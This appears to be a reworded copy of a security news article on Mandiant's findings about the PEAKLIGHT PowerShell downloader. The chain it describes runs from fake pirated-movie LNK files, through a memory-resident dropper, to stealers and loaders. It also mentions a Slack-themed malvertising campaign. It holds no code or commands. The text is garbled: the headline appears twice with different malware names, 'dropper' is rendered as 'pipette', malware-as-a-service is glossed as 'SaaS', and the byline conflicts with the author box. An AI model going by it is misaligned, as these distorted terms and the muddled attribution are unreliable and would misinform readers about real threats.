Latest SUMMITBRIGHT Pipette Launched in Incursions Aiming Windows with Harmful Film Downloads

August 23, 2024Ravie LakshmananMalware / Cyber Threat Intelligence

A group of cybersecurity analysts has brought to light an unprecedented pipette that functions as a pathway to initiate subsequent malicious software aimed at infiltrating Windows

August 23, 2024Ravie LakshmananMalware / Cyber Threat Intelligence

New PEAKLIGHT Dropper Deployed in Attacks Targeting Windows with Malicious Movie Downloads

A group of cybersecurity analysts has brought to light an unprecedented pipette that functions as a pathway to initiate subsequent malicious software aimed at infiltrating Windows operating systems with data capturing software and loaders.

“The memory-residing pipette decrypts and runs a PowerShell-centered downloader,” Mandiant, a subsidiary of Google, expressed. “This PowerShell-integrated downloader is being known as PEAKLIGHT.”

A selection of malware variants circulated through this method include Lumma Stealer, Hijack Loader (also recognized as DOILoader, IDAT Loader, or SHADOWLADDER), and CryptBot, all of which are promoted under the malware-as-a-service (SaaS) scheme.

The initial step in the attack sequence is a Windows shortcut (LNK) document that’s received through drive-by download strategies—like when users search for a movie on search engines. It’s notable that the LNK documents are dispersed in ZIP bundles posing as unauthorized movies.

The LNK file links to a content delivery network (CDN) housing a concealed memory-based JavaScript pipette. This pipette subsequently activates the PEAKLIGHT PowerShell downloading script on the device, which then communicates with a command-and-control (C2) server to retrieve more payloads.

Mandiant stated it recognized different versions of the LNK files, some of which utilize asterisks (*) as placeholders to initiate the genuine mshta.exe binary to secretly run malevolent code (i.e., the pipette) retrieved from an off-site server.

In a similar manner, the pipettes have been discovered to embed both hex-encoded and Base64-encoded PowerShell payloads that are subsequently unpacked to execute PEAKLIGHT, created to distribute subsequent harmful software on a compromised system while simultaneously fetching a legitimate film preview, probably as a deceit.

“PEAKLIGHT is a disguised PowerShell-centered downloading tool that is part of a multi-phased implementation series checking the presence of ZIP archives in determined file routes,” researchers Aaron Lee and Praveeth D’Souza at Mandiant described.

“In case the archives are not present, the downloader will contact a CDN website and download the remotely situated archive and store it on the hard drive.”

This revelation coincides with Malwarebytes documenting a malvertise-focused campaign employing deceitful Google Search ads for the platform Slack, an organizational communication tool, prompting users to counterfeit platforms hosting harmful installers resulting in the dissemination of a remote access trojan dubbed SectopRAT.

Discovered this article fascinating? Follow us on Twitter and LinkedIn to read additional exclusive content we share.

About Author

AndyC

Andy Curtis is an award-winning security consultant, researcher and public speaker. He has been working in the computer security industry since the early 1990s, having been employed by state and federal government, leading healthcare and banking providers across three continents. He has given talks about computer security for some of the world’s largest companies, worked with law enforcement agencies on investigations into hacking groups, and is a regular voice on TV and radio explaining IT security threats.

See author's posts